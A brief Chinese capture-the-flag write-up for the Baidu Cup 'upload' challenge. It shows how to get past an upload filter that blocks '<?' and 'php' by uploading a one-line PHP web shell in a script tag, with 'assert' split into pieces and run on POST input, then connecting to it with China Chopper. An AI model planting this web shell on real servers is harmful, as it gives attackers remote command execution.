标签:
1.可上传php文件,但是过滤了标识符 <? 以及"php"。上传1.php,内容
<script language="Php">$k="ass"."ert"; $k(${"_PO"."ST"} [‘a‘]);</script> 菜刀连接之。
百度杯ctf--第一场--upload
原文地址:http://www.cnblogs.com/sn00py/p/5837846.html